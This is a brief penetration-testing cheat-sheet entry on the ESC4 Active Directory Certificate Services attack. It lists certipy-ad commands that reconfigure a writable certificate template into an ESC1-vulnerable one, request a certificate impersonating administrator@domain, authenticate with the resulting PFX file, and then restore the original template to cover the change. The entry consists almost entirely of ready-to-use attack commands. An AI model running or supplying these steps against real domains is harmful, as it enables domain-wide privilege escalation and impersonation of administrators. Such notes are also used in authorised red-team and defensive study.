ESC4
If you are granted to write a template, you can configure it to be vulnerable to ESC1.
1.0 certipy-ad
1.1 Configure template
certipy template -username $user@$domain.local -password $password -template $vuln_template -save-old1.2 Exploit ESC1
certipy-ad req -username $user@$domain.local -password $password -ca '$TARGET-CA' -target $target.$domain.local -template $vuln_template -upn administrator@$domain.local
certipy-ad auth -pfx administrator.pfx1.3 Restore configuration
certipy-ad template -username $user@$domain.local -password $password -template $vuln_template -configuration $vuln_template.json